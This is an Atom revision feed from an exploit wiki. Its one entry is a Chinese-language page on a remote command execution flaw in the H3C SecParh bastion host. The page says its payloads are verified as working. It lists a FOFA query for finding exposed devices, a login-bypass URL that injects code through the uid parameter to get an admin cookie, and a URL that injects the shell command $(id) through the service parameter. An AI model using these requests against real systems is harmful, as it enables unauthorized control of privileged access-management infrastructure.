<?xml version="1.0"?>
<feed xmlns="http://www.w3.org/2005/Atom" xml:lang="chinese">
	<id>https://pwnwiki.com/index.php?action=history&amp;feed=atom&amp;title=H3C_SecParh%E5%A0%A1%E5%A3%98%E6%A9%9F_data_provider.php_%E9%81%A0%E7%A8%8B%E5%91%BD%E4%BB%A4%E5%9F%B7%E8%A1%8C%E6%BC%8F%E6%B4%9E%2Fzh-tw</id>
	<title>H3C SecParh堡壘機 data provider.php 遠程命令執行漏洞/zh-tw - Revision history</title>
	<link rel="self" type="application/atom+xml" href="https://pwnwiki.com/index.php?action=history&amp;feed=atom&amp;title=H3C_SecParh%E5%A0%A1%E5%A3%98%E6%A9%9F_data_provider.php_%E9%81%A0%E7%A8%8B%E5%91%BD%E4%BB%A4%E5%9F%B7%E8%A1%8C%E6%BC%8F%E6%B4%9E%2Fzh-tw"/>
	<link rel="alternate" type="text/html" href="https://pwnwiki.com/index.php?title=H3C_SecParh%E5%A0%A1%E5%A3%98%E6%A9%9F_data_provider.php_%E9%81%A0%E7%A8%8B%E5%91%BD%E4%BB%A4%E5%9F%B7%E8%A1%8C%E6%BC%8F%E6%B4%9E/zh-tw&amp;action=history"/>
	<updated>2026-04-13T18:17:51Z</updated>
	<subtitle>Revision history for this page on the wiki</subtitle>
	<generator>MediaWiki 1.35.1</generator>
	<entry>
		<id>https://pwnwiki.com/index.php?title=H3C_SecParh%E5%A0%A1%E5%A3%98%E6%A9%9F_data_provider.php_%E9%81%A0%E7%A8%8B%E5%91%BD%E4%BB%A4%E5%9F%B7%E8%A1%8C%E6%BC%8F%E6%B4%9E/zh-tw&amp;diff=5825&amp;oldid=prev</id>
		<title>Pwnwiki: Created page with &quot;H3C SecParh堡壘機 data provider.php 遠程命令執行漏洞&quot;</title>
		<link rel="alternate" type="text/html" href="https://pwnwiki.com/index.php?title=H3C_SecParh%E5%A0%A1%E5%A3%98%E6%A9%9F_data_provider.php_%E9%81%A0%E7%A8%8B%E5%91%BD%E4%BB%A4%E5%9F%B7%E8%A1%8C%E6%BC%8F%E6%B4%9E/zh-tw&amp;diff=5825&amp;oldid=prev"/>
		<updated>2021-06-24T02:19:34Z</updated>

		<summary type="html">&lt;p&gt;Created page with &amp;quot;H3C SecParh堡壘機 data provider.php 遠程命令執行漏洞&amp;quot;&lt;/p&gt;
&lt;p&gt;&lt;b&gt;New page&lt;/b&gt;&lt;/p&gt;&lt;div&gt;&amp;lt;languages /&amp;gt;&lt;br /&gt;
{| style=&amp;quot;margin: auto; width: 750px;color:green;&amp;quot;&lt;br /&gt;
| style=&amp;quot;text-align: left; margin: 1em 1em 1em 0; border: 1px solid #20A3C0; padding: .2em;&amp;quot; |&lt;br /&gt;
{| cellspacing=&amp;quot;2px&amp;quot; &lt;br /&gt;
| valign=&amp;quot;middle&amp;quot; | [[Image:Check.png|50px]]&lt;br /&gt;
| &amp;lt;strong&amp;gt;該漏洞已通過驗證。&amp;lt;/strong&amp;gt;&lt;br /&gt;
|&lt;br /&gt;
| &amp;lt;center&amp;gt;本頁面的EXP/POC/Payload經測試可用，漏洞已經成功復現。&amp;lt;/center&amp;gt;&lt;br /&gt;
|}&lt;br /&gt;
|}&lt;br /&gt;
&amp;lt;br&amp;gt;&amp;lt;noinclude&amp;gt;&lt;br /&gt;
&lt;br /&gt;
==漏洞影響==&lt;br /&gt;
H3C SecParh fortress machine&lt;br /&gt;
&lt;br /&gt;
==FOFA==&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
app=&amp;quot;H3C-SecPath-运维审计系统&amp;quot; &lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
==漏洞利用==&lt;br /&gt;
通過任意用戶登錄獲取Cookie：&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
/audit/gui_detail_view.php?token=1&amp;amp;id=%5C&amp;amp;uid=%2Cchr(97))%20or%201:%20print%20chr(121)%2bchr(101)%2bchr(115)%0d%0a%23&amp;amp;login=admin&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
/audit/data_provider.php?ds_y=2019&amp;amp;ds_m=04&amp;amp;ds_d=02&amp;amp;ds_hour=09&amp;amp;ds_min40&amp;amp;server_cond=&amp;amp;service=$(id)&amp;amp;identity_cond=&amp;amp;query_type=all&amp;amp;format=json&amp;amp;browse=true&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
==參考==&lt;br /&gt;
https://mp.weixin.qq.com/s/rt8lJaLUTVuZd187zrruMw&lt;/div&gt;</summary>
		<author><name>Pwnwiki</name></author>
	</entry>
</feed>